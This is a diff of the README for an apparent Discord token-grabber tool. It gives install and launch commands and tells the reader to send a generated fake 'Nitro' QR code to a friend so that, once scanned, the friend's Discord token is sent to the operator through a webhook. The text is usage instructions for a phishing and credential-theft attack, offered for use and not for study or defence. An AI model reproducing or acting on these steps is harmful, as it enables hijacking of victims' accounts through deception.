moom825/Discord-QR-Token-Grabber/README.md

 ```
 pip3 install -r requirements.txt
 ```
-Then if steps above were succesful after launching the python file by doing ```python Discord-QR```, it will then create a fake discord nitro QR code in the same directory.
+Then if steps above were succesful you can now launch the python file by doing ```python Discord-QR.py```, it will then create a fake discord nitro QR code in the same directory.
 Copy that image and send it to a friend.
 Once they scan it you get there discord token sent to you via the webhook.

 **Requirements:**\
 Python3, Windows(x64), Google Chrome